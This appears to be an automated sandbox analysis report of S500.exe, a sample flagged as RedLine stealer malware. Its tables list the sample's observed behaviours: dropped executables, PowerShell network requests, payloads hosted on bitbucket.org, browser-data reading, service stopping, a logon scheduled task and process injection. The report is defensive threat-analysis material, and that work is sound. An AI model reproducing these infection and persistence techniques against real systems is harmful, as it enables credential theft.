Analysis Overview
SHA256
24f095f4f5796561cc9f9c60f71a2182fee89692f239c92e7447af3461e12731
Threat Level: Known bad
The file S500.exe was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
Blocklisted process makes network request
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Enumerates connected drives
Checks installed software on the system
Power Settings
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Modifies registry class
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-06 05:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-06 05:24
Reported
2024-07-06 05:27
Platform
win10v2004-20240704-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\S500.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\Steam\Steam.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\RunNodeScriptAtLogon | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 532 set thread context of 400 | N/A | C:\Users\Admin\AppData\Roaming\g2lnt0fr.0hf2.exe | C:\Windows\system32\dialer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\safe.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\core\dist\rfc3161\error.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\semver\classes\index.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\exponential-backoff\LICENSE | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\bin\qrcode-terminal.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\https-proxy-agent\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\constants.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\translations\en-short.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\man\man1\npm-dedupe.1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\cli-columns\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\wcwidth\docs\index.md | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\lib\utils\open-url-prompt.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\shebang-regex\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\graceful-fs\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmversion\lib\index.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\columnify\index.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\ip-address\dist\v6\regular-expressions.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\android.py | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\RGI_Emoji.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm.ps1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-star.html | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\cmd-shim\LICENSE | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\encodings\tables\shiftjis.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\dist\cjs\assert-valid-pattern.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\MSVSNew.py | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\LICENSE-MIT | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\cmp.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\corepack\shims\npx.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\has-magic.d.ts | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\dist\bundler\base.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\find-visualstudio.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\lib\warning_messages.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\corepack\shims\corepack.ps1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\man\man1\npm-team.1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\LICENSE.md | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\is-fullwidth-code-point\index.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\clean.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\string-width-cjs\index.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarn.ps1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\dist\target.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\name-from-folder\LICENSE | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\string.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\lib\commands\owner.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\man\man1\npm-login.1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\hosted-git-info\LICENSE | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\process.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\has-magic.d.ts | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\core\dist\rfc3161\timestamp.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\read-cmd-shim\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\disparity-colors\LICENSE | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\metavuln-calculator\lib\advisory.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\lib\index.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-fetch\package.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\mode-fix.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-exec.md | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\bundle\dist\error.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\index.d.ts | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\MSVSToolFile.py | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\lib\typos.json | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\string-width-cjs\license | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-unstar.md | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e588b24.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8FCA.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9C7D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e588b28.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF629.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8EED.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF405.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e588b24.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8F8A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA690.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720243580" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPath | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\PackageCode = "AC6AA920FB9737143A7998E5BED98A71" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductIcon = "C:\\Windows\\Installer\\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\\NodeIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNode = "EnvironmentPath" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductName = "Node.js" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\corepack | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNpmModules = "EnvironmentPath" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Version = "336330754" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\PackageName = "nodejs-installer.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\9E63273695FED9F4289603381C6A6C6D | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\NodeRuntime | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\71F.tmp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\npm | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\DocumentationShortcuts | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\71F.tmp\\" | C:\Windows\system32\msiexec.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
